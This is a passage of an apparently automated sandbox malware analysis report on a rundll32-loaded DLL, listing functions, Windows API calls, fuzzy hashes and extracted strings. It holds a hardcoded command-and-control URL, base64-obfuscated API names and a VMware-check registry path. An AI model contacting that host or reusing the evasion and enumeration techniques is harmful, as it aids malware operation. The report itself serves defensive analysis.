                                      • CloseHandle.KERNEL32(00000000), ref: 1000958A
                                      • Sleep.KERNEL32(00002710), ref: 10009595
                                      • CloseHandle.KERNEL32(00000000), ref: 1000959E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: CloseCreateHandle$ErrorLastMutexObjectSingleSleepStartupThreadWait
                                      • String ID:
                                      • API String ID: 3243752880-0
                                      • Opcode ID: 17ecd922373021ccc26ed0776112388b15e0fc03dd09d5e994e296d1f773db05
                                      • Instruction ID: f421bb569ff3a6cc1cd0ae4f97cefabef7536e0662718203c2adf22941bcd44e
                                      • Opcode Fuzzy Hash: 17ecd922373021ccc26ed0776112388b15e0fc03dd09d5e994e296d1f773db05
                                      • Instruction Fuzzy Hash: C0012875244220BBF62197618C4EFDF3B28EB8D791F500220FB18961C2C775A914C3B6
                                      Function 10009C70 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • http://107.163.241.186:12354/login.php, xrefs: 10009CE3
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Sleep$D262wsprintf
                                      • String ID: http://107.163.241.186:12354/login.php
                                      • API String ID: 1791923907-2223919147
                                      • Opcode ID: 694391d3b39d992574a20db0da015c0f38dc4f3f9208cd7deb46858057425b11
                                      • Instruction ID: 96d5f2fb8650a78ccf418842dd4e97db4fe2b4609ab24aaa4029efad7a9bdec8
                                      • Opcode Fuzzy Hash: 694391d3b39d992574a20db0da015c0f38dc4f3f9208cd7deb46858057425b11
                                      • Instruction Fuzzy Hash: 07318D319446956BF320CA34CC62BDB37D9EB463D0F114A2DF78587185EA36E848C293
                                      Function 10011181 Relevance: 3.8, APIs: 3, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: _inittermfreemalloc
                                      • String ID:
                                      • API String ID: 1678931842-0
                                      • Opcode ID: 89a88f4e84c4b1e58b0e9ea1bbdff44fa1b2eeffde783faa751c3280ef985327
                                      • Instruction ID: a3f3e8324c5b3e50e68b642cab27e3164d803a3a377d102eee1bb53c49589baa
                                      • Opcode Fuzzy Hash: 89a88f4e84c4b1e58b0e9ea1bbdff44fa1b2eeffde783faa751c3280ef985327
                                      • Instruction Fuzzy Hash: 8E11FA32645226AFF72CCBA8EE94E9977E5EB08391B118019E901CB160E735E8908B54
                                      Function 10002D40 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcAddress.KERNEL32(6EBC0000,00000000), ref: 10002D64
                                      Strings
                                      • TmV0TG9jYWxHcm91cEVudW0=, xrefs: 10002D50
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: AddressProc
                                      • String ID: TmV0TG9jYWxHcm91cEVudW0=
                                      • API String ID: 190572456-980335172
                                      • Opcode ID: 3f2d0679c1c961da4bf78d4d4b53a185f0cc3ff58a33cb7d87503068401a1db2
                                      • Instruction ID: 426e6b0573956a2a964d800dfb9f5cedc638600491c3979137d1d50aff8110e9
                                      • Opcode Fuzzy Hash: 3f2d0679c1c961da4bf78d4d4b53a185f0cc3ff58a33cb7d87503068401a1db2
                                      • Instruction Fuzzy Hash: A1C08CF48002205BF641CB648C88B0932A8E30C28AB008010F50DD222AD630E2848721
                                      Function 10002E00 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcAddress.KERNEL32(6EBC0000,00000000), ref: 10002E24
                                      Strings
                                      • TmV0QXBpQnVmZmVyRnJlZQ==, xrefs: 10002E10
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: AddressProc
                                      • String ID: TmV0QXBpQnVmZmVyRnJlZQ==
                                      • API String ID: 190572456-3244026974
                                      • Opcode ID: 3fadc47ae94f51a42844ab3558ef58d288ba066830200869926fcfa67396abfa
                                      • Instruction ID: 2fae8953d5955be7595a5657c67f85d266c220fedc191ac5fad8892b6c7ec77a
                                      • Opcode Fuzzy Hash: 3fadc47ae94f51a42844ab3558ef58d288ba066830200869926fcfa67396abfa
                                      • Instruction Fuzzy Hash: 45C08CF88002505BF681CBA0CC88B0632A9E30C28A7008024F849C221BD634E2E48721
                                      Function 1000B700 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 1000B3C0: lstrcpy.KERNEL32(00000000,?), ref: 1000B3F4
                                        • Part of subcall function 1000B3C0: lstrcat.KERNEL32(00000000,10019C10), ref: 1000B40D
                                        • Part of subcall function 1000B3C0: lstrcat.KERNEL32(00000000,*.*), ref: 1000B41C
                                        • Part of subcall function 1000B3C0: FindFirstFileA.KERNEL32(00000000,?), ref: 1000B42E
                                      • Sleep.KERNEL32(0036EE80), ref: 1000B7A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrcat$FileFindFirstSleeplstrcpy
                                      • String ID: C:\Program Files
                                      • API String ID: 187370985-1387799010
                                      • Opcode ID: c210b9063764c7f6096e7048406087fc1d266cba2aab8d6c671f5bab15b8f448
                                      • Instruction ID: 34d684334c7274c303d5a2eab8ad17a067ee82296af27424734a78a44ff59643
                                      • Opcode Fuzzy Hash: c210b9063764c7f6096e7048406087fc1d266cba2aab8d6c671f5bab15b8f448
                                      • Instruction Fuzzy Hash: A2115E789097598BF304DF6998C154BBBE0FB85784F108929F88983316EB71DA498BD2
                                      Function 10005310 Relevance: 1.5, APIs: 1, Instructions: 20registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegCreateKeyExA.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 1000533D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 797ccceb2a6220eaf1b4da9278694c3052d15d15b886ab40c5ba1907cad651cd
                                      • Instruction ID: f0b58f1054efd69a3b3c561961df13c78b53d0028abc68edc269c93d18d29df8
                                      • Opcode Fuzzy Hash: 797ccceb2a6220eaf1b4da9278694c3052d15d15b886ab40c5ba1907cad651cd
                                      • Instruction Fuzzy Hash: 23E00AB5218601AF9604CF49C994D1BB3F9ABCC700F10CA0CB599C3254D630E806CB62
                                      Function 10005100 Relevance: 1.5, APIs: 1, Instructions: 14networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,?,00000000), ref: 1000511E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID:
                                      • API String ID: 2038078732-0
                                      • Opcode ID: 79fb8dd1e416200e2006b02a81ba11ca3d168ec2f8ff613b71efe962d633b550
                                      • Instruction ID: b03028c7f8be2f45730d069a64a3eb3b23702ea1336b4465e57dd578e4720c79
                                      • Opcode Fuzzy Hash: 79fb8dd1e416200e2006b02a81ba11ca3d168ec2f8ff613b71efe962d633b550
                                      • Instruction Fuzzy Hash: 91D0BCB5618342AFD708CF58D994D3BB7E9BBC8600F188D0CB59583254D730E849CB62
                                      Function 10005360 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegQueryValueExA.KERNEL32(?,?,?,?,?,00000000,100077BC), ref: 1000537E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: QueryValue
                                      • String ID:
                                      • API String ID: 3660427363-0
                                      • Opcode ID: 9aa5dfaef623244c62c00e6734dd321eea35094b4d860f5643c27326aa40c040
                                      • Instruction ID: a74c4bf4350e4793b53797d283791a1897b8d7f4ca6b0b58efb56db84ac5c6a9
                                      • Opcode Fuzzy Hash: 9aa5dfaef623244c62c00e6734dd321eea35094b4d860f5643c27326aa40c040
                                      • Instruction Fuzzy Hash: 55D0BCB5618352AF9704CF58D994D3BB7E9BBC8600F148D0CB5A583254D770E849CB72
                                      Function 100053B0 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegSetValueExA.KERNEL32(?,?,?,?,?,?), ref: 100053CE
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Value
                                      • String ID:
                                      • API String ID: 3702945584-0
                                      • Opcode ID: bd36dcca12709300afda0dce087f67a4daa03fa626df9e30e4f30e72f73358e9
                                      • Instruction ID: 545330c7644c0352da8339c59963a64c4c0f3ddebddf9092b34a8f3a8fbdc6b4
                                      • Opcode Fuzzy Hash: bd36dcca12709300afda0dce087f67a4daa03fa626df9e30e4f30e72f73358e9
                                      • Instruction Fuzzy Hash: 51D06CB5208382AF9704CF98C884C3BB3E9BBC8600F048D0CB59583210C730E808CB62
                                      Function 10009ABD Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: D262
                                      • String ID:
                                      • API String ID: 1394008445-0
                                      • Opcode ID: c32c3222084e50551be5b3dd1d5fbdfa23b4dfe8b4897024deef5f29e3ecea09
                                      • Instruction ID: 587057179f6ea8c11798d24fe955b4de24e5558434809c040a74657806c4aeb1
                                      • Opcode Fuzzy Hash: c32c3222084e50551be5b3dd1d5fbdfa23b4dfe8b4897024deef5f29e3ecea09
                                      • Instruction Fuzzy Hash: 4FD01278908710EBD190EB59B9921AEB291FF00240F944069FDD45B712E2709A589B67
                                      Function 100050E0 Relevance: 1.5, APIs: 1, Instructions: 12networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenA.WININET(?,?,?,?,?), ref: 100050F9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID:
                                      • API String ID: 2038078732-0
                                      • Opcode ID: 879c65d6f26f338801834b9cd5808f4cc1cf4df936376d16fc6ebb1aa6ac17b0
                                      • Instruction ID: 044530a7792eeb6987733a37bd1277e0a1591d4b183eda353221cda114360c91
                                      • Opcode Fuzzy Hash: 879c65d6f26f338801834b9cd5808f4cc1cf4df936376d16fc6ebb1aa6ac17b0
                                      • Instruction Fuzzy Hash: 14D0C5F9218201AFDA08CB58D994C2BB3E9ABC8710F00CA0CB5A983244C630E804CB62
                                      Function 10005390 Relevance: 1.5, APIs: 1, Instructions: 12registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.KERNEL32(?,?,?,000F003F,00000000,10005862,80000000,00000000,00000000,000F003F,?,QXBwbGljYXRpb25zXFxWTXdhcmVIb3N0T3Blbi5leGU=,?,1000BD12), ref: 100053A9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: b365e116d62356edbac829584962df87571ad8eae1ae707586eda98c8ac89151
                                      • Instruction ID: d6aabc516d543bdc87cc0c4a5e1d9a174d5608901055bf3910c018a9f96aa6ad
                                      • Opcode Fuzzy Hash: b365e116d62356edbac829584962df87571ad8eae1ae707586eda98c8ac89151
                                      • Instruction Fuzzy Hash: 05D0C5B9218201AFAA18CB58D994D2BB3EAABC8710F00C90CB5A983240C634E844CB32
                                      Function 10005080 Relevance: 1.5, APIs: 1, Instructions: 8synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateMutexA.KERNEL32(?,?,?,10009555), ref: 1000508F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: CreateMutex
                                      • String ID:
                                      • API String ID: 1964310414-0
                                      • Opcode ID: fdb6fa81ec76c1724b80fca2210392765ef5a25415d8d2b79c16f2728e524eba
                                      • Instruction ID: 65ecd0d9e123e5c59dbe5454a5e8d83e6f765d425f52b2c6b9e17714dbbc7e55
                                      • Opcode Fuzzy Hash: fdb6fa81ec76c1724b80fca2210392765ef5a25415d8d2b79c16f2728e524eba
                                      • Instruction Fuzzy Hash: EFC048B8608200BFEA04CB10C988C2BB7A9EBC8620F10C90CB88983210C670FC40DA22
                                      Function 10005260 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetShortPathNameA.KERNEL32(?,?,?), ref: 1000526F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: NamePathShort
                                      • String ID:
                                      • API String ID: 1295925010-0
                                      • Opcode ID: c1f1c3dc28f6a40e27559f1a23b5eb1c7877f6347995135ce4b953c13975f4ef
                                      • Instruction ID: 0c1c8b250da901cb55db93dd3a23e7b623ab8ec60d836218a20953e263ce1084
                                      • Opcode Fuzzy Hash: c1f1c3dc28f6a40e27559f1a23b5eb1c7877f6347995135ce4b953c13975f4ef
                                      • Instruction Fuzzy Hash: C3C04CB8208200BFEA04CB10C984C2BB7B9EBC8610F00C90CB88942211C634EC40DA11
                                      Function 10005400 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      • Process32First.KERNEL32(?,?), ref: 1000540A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: FirstProcess32
                                      • String ID:
                                      • API String ID: 2623510744-0
                                      • Opcode ID: 7da1f6548b6cdf32f07d888ab53a94aa8a28520b62a2054868ec8d135c91c293
                                      • Instruction ID: 9d9cdc26d7b2138dada01c5f17ffc5f241ad811d55aab60bc3c65502b5f92e19
                                      • Opcode Fuzzy Hash: 7da1f6548b6cdf32f07d888ab53a94aa8a28520b62a2054868ec8d135c91c293
                                      • Instruction Fuzzy Hash: CBB092B5204200ABD204DB10CA88C2BB7A8ABD4310B008808B48D82155C634D840CB21
                                      Function 10005420 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      • Process32Next.KERNEL32(?,?), ref: 1000542A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: NextProcess32
                                      • String ID:
                                      • API String ID: 1850201408-0
                                      • Opcode ID: 9645eb27314659e76ee4f0e7963ffa02cae01bc347750a30513afb982d5bd179
                                      • Instruction ID: d3ad5189f9af5431b8854f2ef1100ff7cc61f3f67fb8f5bf956713fc7da7eafb
                                      • Opcode Fuzzy Hash: 9645eb27314659e76ee4f0e7963ffa02cae01bc347750a30513afb982d5bd179
                                      • Instruction Fuzzy Hash: F3B09275104200ABD204DB10C988C2BB7A8BBD5320B008808B48982114C630D840CB21
                                      Function 10001C90 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(04603060), ref: 10001CA6
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 349a52fe4ec56f5007f733bfb711c7e24146eda3fe89fc2105d0191a92a3d262
                                      • Instruction ID: df90cce034d612537076caa3fd0af17fcb468ffd39476ea18b5eb170f5c43ea3
                                      • Opcode Fuzzy Hash: 349a52fe4ec56f5007f733bfb711c7e24146eda3fe89fc2105d0191a92a3d262
                                      • Instruction Fuzzy Hash: 07B092B08042218BF7028BB08CC880636F4EB49291390C001F800C3268D630C190AB10
                                      Function 10001CF0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(04601050), ref: 10001D06
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
